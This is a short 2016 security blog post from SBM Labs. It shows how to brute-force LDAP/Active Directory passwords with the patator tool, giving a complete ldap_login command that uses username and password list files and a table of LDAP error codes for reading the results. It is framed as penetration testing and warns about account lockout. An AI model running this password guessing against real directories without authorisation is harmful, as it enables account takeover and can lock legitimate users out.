SBM Labs

Cyber Security Collaboration Project

Brute-Force LDAP accounts with Patator
18 Sep 2016

Despite the use of password policy ldap users can use use dictionary passwords. Our aim is to test ldap accounts for its security. We will use tool patator for analysis. It's python script.

First of all we need to download patator.

Then we need to install ldap-utils.

$ sudo apt-get install ldap-utils

Finally we need list of ldap accounts and passwords. In order to get ldap accounts you can follow this guide Gathering information about Active Directory users. Password list can be downloaded from Internet or made youself using wordlist generator crunch.

Before you run patator pay your attention to account lockout policy. Otherwise you can lock ldap accounts and break business processes.

Now we are ready. Let's start.

$ ./patator.py ldap_login host=[IP_ADDRESS] binddn='CN=FILE0,OU=[DN_PATH]' bindpw=FILE1 0=/mnt/data/pentest/patator-master/logins.txt 1=/mnt/data/pentest/patator-master/passwords.txt ssl=1 port=636

We use ldap_login module. FILE0 stores user's CNs. FILE1 stores passwords list.

There are LDAP Error Codes in patator output. Look at code and mesg fields.

code mesg description
32 - LDAP_NO_SUCH_OBJECT
49 data 52e AD_INVALID CREDENTIALS
49 data 532 PASSWORD_EXPIRED
49 data 533 ACCOUNT_DISABLED
49 data 773 USER MUST RESET PASSWORD

You can filter unnecessary data using -x ignore:fgrep= option. For example, -x ignore:fgrep=52e.

Metasploit vs Software Updates